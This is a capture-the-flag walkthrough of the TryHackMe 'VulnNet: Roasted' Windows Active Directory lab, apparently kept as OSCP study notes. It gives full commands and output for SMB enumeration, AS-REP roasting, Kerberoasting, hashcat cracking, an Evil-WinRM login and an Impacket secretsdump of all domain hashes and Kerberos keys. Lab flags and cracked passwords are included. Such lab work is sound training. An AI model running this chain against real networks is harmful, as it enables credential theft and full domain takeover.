THM Easy VulnNet Roasted done
Easy_VulnNet_Roasted¶
OS:¶
Windows
Open ports:¶
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-02-02 11:59:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49665/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49709/tcp open msrpc Microsoft Windows RPC
Scan nmap¶
sudo nmap -Pn -A -sV --script=default,vuln -p- --open -oA 10.10.31.226_nmap_vulns 10.10.31.226
Scan enum4linux¶
enum4linux -u "" -p "" -a 10.10.151.58 | tee 10.10.151.58_enum4linux
enum4linux -u "anonymous" -p "anonymous" -a 10.10.151.58 | tee 10.10.151.58_enum4linux_anonymous
=================================( Share Enumeration on 10.10.151.58 )=================================
do_connect: Connection to 10.10.151.58 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
VulnNet-Business-Anonymous Disk VulnNet Business Sharing
VulnNet-Enterprise-Anonymous Disk VulnNet Enterprise Sharing
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.151.58
//10.10.151.58/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.151.58/C$ Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_NO_SUCH_FILE listing \*
//10.10.151.58/IPC$ Mapping: N/A Listing: N/A Writing: N/A
//10.10.151.58/NETLOGON Mapping: OK Listing: DENIED Writing: N/A
//10.10.151.58/SYSVOL Mapping: OK Listing: DENIED Writing: N/A
//10.10.151.58/VulnNet-Business-Anonymous Mapping: OK Listing: OK Writing: N/A
//10.10.151.58/VulnNet-Enterprise-Anonymous Mapping: OK Listing: OK Writing: N/A
Dowload files from: VulnNet-Business-Anonymous #rabbit-hole¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ smbclient \\\\10.10.151.58\\VulnNet-Business-Anonymous
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Mar 12 21:46:40 2021
.. D 0 Fri Mar 12 21:46:40 2021
Business-Manager.txt A 758 Thu Mar 11 20:24:34 2021
Business-Sections.txt A 654 Thu Mar 11 20:24:34 2021
Business-Tracking.txt A 471 Thu Mar 11 20:24:34 2021
8540159 blocks of size 4096. 4296518 blocks available
smb: \> get Business-Manager.txt
getting file \Business-Manager.txt of size 758 as Business-Manager.txt (1.5 KiloBytes/sec) (average 1.5 KiloBytes/sec)
smb: \> get Business-Sections.txt
getting file \Business-Sections.txt of size 654 as Business-Sections.txt (1.1 KiloBytes/sec) (average 1.3 KiloBytes/sec)
smb: \> get Business-Tracking.txt
getting file \Business-Tracking.txt of size 471 as Business-Tracking.txt (1.1 KiloBytes/sec) (average 1.2 KiloBytes/sec)
smb: \> exit
Dowload files from: VulnNet-Enterprise-Anonymous #rabbit-hole¶
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ smbclient \\\\10.10.151.58\\VulnNet-Enterprise-Anonymous
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Mar 12 21:46:40 2021
.. D 0 Fri Mar 12 21:46:40 2021
Enterprise-Operations.txt A 467 Thu Mar 11 20:24:34 2021
Enterprise-Safety.txt A 503 Thu Mar 11 20:24:34 2021
Enterprise-Sync.txt A 496 Thu Mar 11 20:24:34 2021
8771839 blocks of size 4096. 4525549 blocks available
smb: \> get Enterprise-Operations.txt
getting file \Enterprise-Operations.txt of size 467 as Enterprise-Operations.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> get Enterprise-Safety.txt
getting file \Enterprise-Safety.txt of size 503 as Enterprise-Safety.txt (0.8 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> get Enterprise-Sync.txt
getting file \Enterprise-Sync.txt of size 496 as Enterprise-Sync.txt (0.8 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> exit
Enumerate username - Impacket (lookupsid.py)¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ python3 /home/kali/.local/bin/lookupsid.py [email protected] | tee 10.10.151.58_lookupsid
Password:
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.151.58
[*] StringBinding ncacn_np:10.10.151.58[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)
Enumerate username - list of users¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ cat 10.10.151.58_lookupsid | awk -F"\\" '{print $NF}' | awk '{print $1}' | sort | uniq | grep -v "]" | tee 10.10.151.58_lookupsid_only_users
Administrator
Allowed
a-whitehat
Cert
Cloneable
Denied
DnsAdmins
DnsUpdateProxy
Domain
Enterprise
enterprise-core-vn
Group
Guest
Impacket
j-goldenhand
j-leet
Key
krbtgt
Protected
RAS
Read-only
Schema
t-skid
WIN-2BO8M1OE1M1$
Get all hashes from domain - ASREPRoast¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ python3 /home/kali/.local/bin/GetNPUsers.py 'VULNNET-RST/' -usersfile 10.10.151.58_lookupsid_only_users -no-pass -dc-ip 10.10.151.58
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] invalid principal syntax
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$t-skid@VULNNET-RST:7bee1d639214d8e7bf2638465bca4302$0df296420cf5e457af1d3e7f23f5ca8f04b5ce1e1971526e505b2b701b27e4e35b2447d9d73d8b68f58fecdabf4d0d69a7faef69f8b4cb7ee1955e496d17c451e91d7340bf73447b9e6378d6a09bdf728e068a936756cde5fc9b72928b007f9979f96917ecbc2e54dd124d420704494ca603deacb72017af03f96e1d2894a321b4ad85e5d9ea55474d8e965eba5526f65c88460fb1d2d29f467a7854a10fe84fd1dd6473311c0db10f3d00beacbf41b1981b383b904e74bdb6348bfdf1aafe9d3e7e47a19d445b25576606121a4bd6a7f6a3620d873e169ceaa953c5293f5093e80947f2ac5ee730521187a1b27843c5
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
Hash for user: t-skid¶
$krb5asrep$23$t-skid@VULNNET-RST:7bee1d639214d8e7bf2638465bca4302$0df296420cf5e457af1d3e7f23f5ca8f04b5ce1e1971526e505b2b701b27e4e35b2447d9d73d8b68f58fecdabf4d0d69a7faef69f8b4cb7ee1955e496d17c451e91d7340bf73447b9e6378d6a09bdf728e068a936756cde5fc9b72928b007f9979f96917ecbc2e54dd124d420704494ca603deacb72017af03f96e1d2894a321b4ad85e5d9ea55474d8e965eba5526f65c88460fb1d2d29f467a7854a10fe84fd1dd6473311c0db10f3d00beacbf41b1981b383b904e74bdb6348bfdf1aafe9d3e7e47a19d445b25576606121a4bd6a7f6a3620d873e169ceaa953c5293f5093e80947f2ac5ee730521187a1b27843c5
Cracking hash for user: t-skid¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ hashcat -m 18200 -a 0 t-skid_hash.txt /tmp/rockyou.txt -o 10.10.151.58_hash_cracked
...
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$t-skid@VULNNET-RST:7bee1d639214d8e7bf...7843c5
Time.Started.....: Thu Feb 2 16:13:59 2023 (3 secs)
Time.Estimated...: Thu Feb 2 16:14:02 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/tmp/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1306.5 kH/s (0.93ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3178496/14344385 (22.16%)
Rejected.........: 0/3178496 (0.00%)
Restore.Point....: 3176448/14344385 (22.14%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: tjh10793 -> tj030499
Hardware.Mon.#1..: Util: 64%
Started: Thu Feb 2 16:13:35 2023
Stopped: Thu Feb 2 16:14:03 2023
Cracked hash for user: t-skid¶
tj072889*
Keberoasting¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ python3 /home/kali/.local/bin/GetUserSPNs.py 'VULNNET-RST.local/t-skid:tj072889*' -output 10.10.186.74_keberoast.hash -dc-ip 10.10.186.74
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- ------------------ ------------------------------------------------------------- -------------------------- -------------------------- ----------
CIFS/vulnnet-rst.local enterprise-core-vn CN=Remote Management Users,CN=Builtin,DC=vulnnet-rst,DC=local 2021-03-11 14:45:09.913979 2021-03-13 18:41:17.987528
Identifying the hash¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ name-that-hash -f 10.10.186.74_keberoast.hash | tee 10.10.186.74_keberoast.hash.Identifying
_ _ _____ _ _ _ _ _
| \ | | |_ _| | | | | | | | | |
| \| | __ _ _ __ ___ ___ ______| | | |__ __ _| |_ ______| |_| | __ _ ___| |__
| . ` |/ _` | '_ ` _ \ / _ \______| | | '_ \ / _` | __|______| _ |/ _` / __| '_ \
| |\ | (_| | | | | | | __/ | | | | | | (_| | |_ | | | | (_| \__ \ | | |
\_| \_/\__,_|_| |_| |_|\___| \_/ |_| |_|\__,_|\__| \_| |_/\__,_|___/_| |_|
https://twitter.com/bee_sec_san
https://github.com/HashPals/Name-That-Hash
$krb5tgs$23$*enterprise-core-vn$VULNNET-RST.LOCAL$VULNNET-RST.local/enterprise-core-vn*$a3b7a9fdb5de20b04b4fabb320fb3809$1c3d4fa40ab3b480ebc88564fbaf0dc3c9add988048e13a72fbf58977138cfcc5dcda43659741119a81b90eb16360840d6a8492b790b6d3c340d
40e6a85a96175ad7f92ba3949f8fa4dbfbb2e29b3605433c23322c462923bf069e0178da46cab479d02c49dd2a738b92a7b87fda2c7ea1cde50d8e3944cc835913f2508f16d6faec6ad60e093dc74500c9a68f139bfb685d67447412044f2a97d6816630ae264ef397386efde2ad7adb7e9d0c5103b07
558898a82d56efb9286fe6b9d34c19dec702621b397ff1d9215bc307bd6a398b4f975c590c756c2a7c9445da582cd65222a980cc22ef77fd015bad7d5a1cd4dcbed5ef39fb0c623a1290ae741996f5bc954b5f821cd20de62f62a6511b5ade54326ffd48164b010023618491a4dc9c932ac4d23ed35a0
eae8587cde4bff662b42fe1f16cac7e8425a8cc15e0ccea630eeac8d293bca78617e5f0fe33669dd2402bd5bad67649a0c6941ae13484487d64e03ed4a00efee7866bb086d77f6740173dbb3a2e381748d66dc28a85ae19477f0d652456f7dfc1be57c4635ff1d492c9b9c0f570ef1d737408cea3257d
ecffc19e01579a1202bd92ba6af945511c1dd9cd1420bd8d787ab101981d6486fe9cfa4662b921bac7f2a65a7c1899787d3aab2a3b0efdf8d79bf32eb1e0e7cd7a5051a2b27fe28c201c828649507114b5135ca77771d3ef65f8714f96204068d06563a321f5866c4113870e55f9124a9f82120f4bd03
c4749e1584e959ac13ea4582f9b050395e025f2fd278ac0b279421340181c664ac045d9a25a74da90b226c7b87b3ec210c1ffd88c1137e525f440ac8b85eb7d30314d29a6141a9797f9630c4033e2eb64f9b1ba14387ce9298f86b6f1e7cd37f0da86d26b9e691403fff1acef63e3ce13a03fc1f258c0
eaee83c03692aeddf17541b8e9bc9eb17558be94ad0b04da3a4f0b6e10607024a96677802cc841aa0af3f74caecadac1b6de2309f649b7b1c6ad65eb55a44b5989d2605fb0e4cc3a50f14c1ab9d577a6f6fd3fa1eefea3512eb165ed98c7d69e0abcf86119827653a234a466ed3cde8fbded38eb372d0
75e77b22d47018c0f9f05f1a2bf4f869a41a3f47b8e0d6950ac6ba9675404c1e743b0322a7b787d5fc609c4c2da4f9020da9d2aacbb24c3ba2578252a02cd55346b688de838b0e74d1de7e3b25cecb9b3ca08359ece332495537205421bb0b2597a7e89166e512514d3bc2066cb1bccdba0faf7c9f217
aa8074a97dbea7b6e02078eb067a6f528104322b491ad2ff7798b67354ef2aa39205222f4f6c11efb1512289239596e8e43156eec183e924e67c43f9e2823c4772da1aabbda4182e5e2376ec3ee63110117b2328e19787ebcfbd81681dcae679ef4b535a0d9
Most Likely
Kerberos 5 TGS-REP etype 23, HC: 13100 JtR: krb5tgs Summary: Used in Windows Active Directory.
Cracking Kerberos hash¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ hashcat -m 13100 10.10.186.74_keberoast.hash /tmp/rockyou.txt -o 10.10.186.74_keberoast.hash_cracked
hashcat (v6.2.6) starting
...
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*enterprise-core-vn$VULNNET-RST.LOCAL$V...35a0d9
Time.Started.....: Thu Feb 2 17:35:22 2023 (4 secs)
Time.Estimated...: Thu Feb 2 17:35:26 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/tmp/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1011.8 kH/s (1.06ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4110336/14344385 (28.65%)
Rejected.........: 0/4110336 (0.00%)
Restore.Point....: 4108288/14344385 (28.64%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: ry=iu0if] -> rvy15rv
Hardware.Mon.#1..: Util: 55%
...
Cracked Kerberos hash¶
ry=ibfkfv,s6h,
Login to Windows¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ evil-winrm -u 'enterprise-core-vn' -p 'ry=ibfkfv,s6h,' -i 10.10.50.215
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Documents> whoami
vulnnet-rst\enterprise-core-vn
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Documents>
Read flag: user.txt¶
*Evil-WinRM* PS C:\> ls -l Users/enterprise-core-vn
Directory: C:\Users\enterprise-core-vn
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 3/13/2021 3:43 PM Desktop
d-r--- 3/13/2021 3:42 PM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
*Evil-WinRM* PS C:\> ls -l Users/enterprise-core-vn/Desktop/
Directory: C:\Users\enterprise-core-vn\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/13/2021 3:43 PM 39 user.txt
^[[A*Evil-WinRM* PS Ccat Users/enterprise-core-vn/Desktop/user.txt
THM{726b7c0baaac1455d05c827b5561f4ed}
*Evil-WinRM* PS C:\>
Flag: user.txt¶
THM{726b7c0baaac1455d05c827b5561f4ed}
Open SYSVOL share¶
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ smbclient //10.10.128.12/SYSVOL --user=enterprise-core-vn%ry=ibfkfv,s6h,
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 11 14:19:49 2021
.. D 0 Thu Mar 11 14:19:49 2021
vulnnet-rst.local Dr 0 Thu Mar 11 14:19:49 2021
8771839 blocks of size 4096. 4530213 blocks available
smb: \> cd vulnnet-rst.local\scripts\
smb: \vulnnet-rst.local\scripts\> dir
. D 0 Tue Mar 16 19:15:49 2021
.. D 0 Tue Mar 16 19:15:49 2021
ResetPassword.vbs A 2821 Tue Mar 16 19:18:14 2021
g
8771839 blocks of size 4096. 4530186 blocks available
smb: \vulnnet-rst.local\scripts\> get ResetPassword.vbs
getting file \vulnnet-rst.local\scripts\ResetPassword.vbs of size 2821 as ResetPassword.vbs (2.5 KiloBytes/sec) (average 2.5 KiloBytes/sec)
Read file: ResetPassword.vbs¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ cat ResetPassword.vbs | grep -C1 -i StrPassword
Dim objRootDSE, strDNSDomain, objTrans, strNetBIOSDomain
Dim strUserDN, objUser, strPassword, strUserNTName
--
strUserNTName = "a-whitehat"
strPassword = "bNdKVkjv3RR9ht"
...
Credenciales: a-whitehat¶
User: a-whitehat
Password: bNdKVkjv3RR9ht
Dump hashes from domain¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ python3 /home/kali/.local/bin/secretsdump.py VULNNET-RST.local/a-whitehat:[email protected] | tee 10.10.128.12_hash_dump_domain
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
VULNNET-RST\WIN-2BO8M1OE1M1$:aes256-cts-hmac-sha1-96:16631cfbb039f6902ec0d2f5c07e12b651e317e2a22fe60dc944b98e9c0c2ccf
VULNNET-RST\WIN-2BO8M1OE1M1$:aes128-cts-hmac-sha1-96:87927b2928b58fca8dba7cc08e7dd0d1
VULNNET-RST\WIN-2BO8M1OE1M1$:des-cbc-md5:2c864301e93d8567
VULNNET-RST\WIN-2BO8M1OE1M1$:plain_password_hex:fb01bd39cc426470903994d2a6e5a2980adad499ab4a00a1cdda158a63ce54a8979fdf2155d305413b02d0e1647c2e4dadcba31b0d8048dbf9d13964d517d4ddd86d37e6b8767120a95b6d760291c0bc9e26168184fe2eadcd047b592e8599b8bc526c8b6614050caffe72d2cf659e13fb58fa7264a9c4bbd80add8764c40d41162f47b8a28cb8e4bc8a3334fca309baf9b7fdbb37af00ddf92dda6087193c404f9fc05672ff76c0c2ad118f8cf89679870ee9f2485b9bdae1583931e9570286b2493c172dfb5be7d30246a5a4514f96e521440f1dff8f11a655ac0b00c77b031310ec380b8c31ad5ae4fe668f4d2099
VULNNET-RST\WIN-2BO8M1OE1M1$:aad3b435b51404eeaad3b435b51404ee:de2f972856959531d5b02915e8b8fd73:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x20809b3917494a0d3d5de6d6680c00dd718b1419
dpapi_userkey:0xbf8cce326ad7bdbb9bbd717c970b7400696d3855
[*] NL$KM
0000 F3 F6 6B 8D 1E 2A F4 8E 85 F6 7A 46 D1 25 A0 D3 ..k..*....zF.%..
0010 EA F4 90 7D 2D CB A5 8C 88 C5 68 4C 1E D3 67 3B ...}-.....hL..g;
0020 DB 31 D9 91 C9 BB 6A 57 EA 18 2C 90 D3 06 F8 31 .1....jW..,....1
0030 7C 8C 31 96 5E 53 5B 85 60 B4 D5 6B 47 61 85 4A |.1.^S[.`..kGa.J
NL$KM:f3f66b8d1e2af48e85f67a46d125a0d3eaf4907d2dcba58c88c5684c1ed3673bdb31d991c9bb6a57ea182c90d306f8317c8c31965e535b8560b4d56b4761854a
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7633f01273fc92450b429d6067d1ca32:::
vulnnet-rst.local\enterprise-core-vn:1104:aad3b435b51404eeaad3b435b51404ee:8752ed9e26e6823754dce673de76ddaf:::
vulnnet-rst.local\a-whitehat:1105:aad3b435b51404eeaad3b435b51404ee:1bd408897141aa076d62e9bfc1a5956b:::
vulnnet-rst.local\t-skid:1109:aad3b435b51404eeaad3b435b51404ee:49840e8a32937578f8c55fdca55ac60b:::
vulnnet-rst.local\j-goldenhand:1110:aad3b435b51404eeaad3b435b51404ee:1b1565ec2b57b756b912b5dc36bc272a:::
vulnnet-rst.local\j-leet:1111:aad3b435b51404eeaad3b435b51404ee:605e5542d42ea181adeca1471027e022:::
WIN-2BO8M1OE1M1$:1000:aad3b435b51404eeaad3b435b51404ee:de2f972856959531d5b02915e8b8fd73:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:7f9adcf2cb65ebb5babde6ec63e0c8165a982195415d81376d1f4ae45072ab83
Administrator:aes128-cts-hmac-sha1-96:d9d0cc6b879ca5b7cfa7633ffc81b849
Administrator:des-cbc-md5:52d325cb2acd8fc1
krbtgt:aes256-cts-hmac-sha1-96:a27160e8a53b1b151fa34f45524a07eb9899ebdf0051b20d677f0c3b518885bd
krbtgt:aes128-cts-hmac-sha1-96:75c22aac8f2b729a3a5acacec729e353
krbtgt:des-cbc-md5:1357f2e9d3bc0bd3
vulnnet-rst.local\enterprise-core-vn:aes256-cts-hmac-sha1-96:9da9e2e1e8b5093fb17b9a4492653ceab4d57a451bd41de36b7f6e06e91e98f3
vulnnet-rst.local\enterprise-core-vn:aes128-cts-hmac-sha1-96:47ca3e5209bc0a75b5622d20c4c81d46
vulnnet-rst.local\enterprise-core-vn:des-cbc-md5:200e0102ce868016
vulnnet-rst.local\a-whitehat:aes256-cts-hmac-sha1-96:f0858a267acc0a7170e8ee9a57168a0e1439dc0faf6bc0858a57687a504e4e4c
vulnnet-rst.local\a-whitehat:aes128-cts-hmac-sha1-96:3fafd145cdf36acaf1c0e3ca1d1c5c8d
vulnnet-rst.local\a-whitehat:des-cbc-md5:028032c2a8043ddf
vulnnet-rst.local\t-skid:aes256-cts-hmac-sha1-96:a7d2006d21285baee8e46454649f3bd4a1790c7f4be7dd0ce72360dc6c962032
vulnnet-rst.local\t-skid:aes128-cts-hmac-sha1-96:8bdfe91cca8b16d1b3b3fb6c02565d16
vulnnet-rst.local\t-skid:des-cbc-md5:25c2739dcb646bfd
vulnnet-rst.local\j-goldenhand:aes256-cts-hmac-sha1-96:fc08aeb44404f23ff98ebc3aba97242155060928425ec583a7f128a218e4c5ad
vulnnet-rst.local\j-goldenhand:aes128-cts-hmac-sha1-96:7d218a77c73d2ea643779ac9b125230a
vulnnet-rst.local\j-goldenhand:des-cbc-md5:c4e65d49feb63180
vulnnet-rst.local\j-leet:aes256-cts-hmac-sha1-96:1327c55f2fa5e4855d990962d24986b63921bd8a10c02e862653a0ac44319c62
vulnnet-rst.local\j-leet:aes128-cts-hmac-sha1-96:f5d92fe6dc0f8e823f229fab824c1aa9
vulnnet-rst.local\j-leet:des-cbc-md5:0815580254a49854
WIN-2BO8M1OE1M1$:aes256-cts-hmac-sha1-96:16631cfbb039f6902ec0d2f5c07e12b651e317e2a22fe60dc944b98e9c0c2ccf
WIN-2BO8M1OE1M1$:aes128-cts-hmac-sha1-96:87927b2928b58fca8dba7cc08e7dd0d1
WIN-2BO8M1OE1M1$:des-cbc-md5:8932f73104b5bac2
[*] Cleaning up...
